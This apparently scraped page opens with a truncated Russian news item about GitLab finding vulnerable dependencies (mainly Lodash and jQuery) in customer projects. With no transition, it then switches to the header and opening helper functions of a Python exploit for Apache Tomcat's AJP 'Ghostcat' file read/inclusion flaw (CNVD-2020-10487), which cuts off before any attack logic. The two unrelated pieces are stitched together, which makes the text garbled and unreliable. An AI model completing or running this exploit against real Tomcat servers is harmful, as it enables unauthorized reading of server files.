GitLab обнаружил множество уязвимостей в исходном коде проектов своих клиентов
Самыми распространенными уязвимыми библиотеками
оказались Lodash и JQuery.
Специалисты online-сервиса для работы с
git-репозиториями GitLab проверили безопасность программных проектов своих
клиентов и обнаружили множество уязвимостей.
«Процент проектов, в которых обнаружились проблемы с
зависимыми используемыми библиотеками, значительно увеличился за последний год
— с 26% до 69%. Это еще раз подтверждает, что обновление зависимых библиотек
должно иметь высокий приоритет, исходя из рисков...
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion #!/usr/bin/env python
#CNVD-2020-10487 Tomcat-Ajp lfi
#by ydhcui
import struct
# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
size = struct.calcsize(fmt)
buf = stream.read(size)
return struct.unpack(fmt, buf)
def unpack_string(stream):
size, = unpack(stream, ">h")
if size == -1: # null string
return...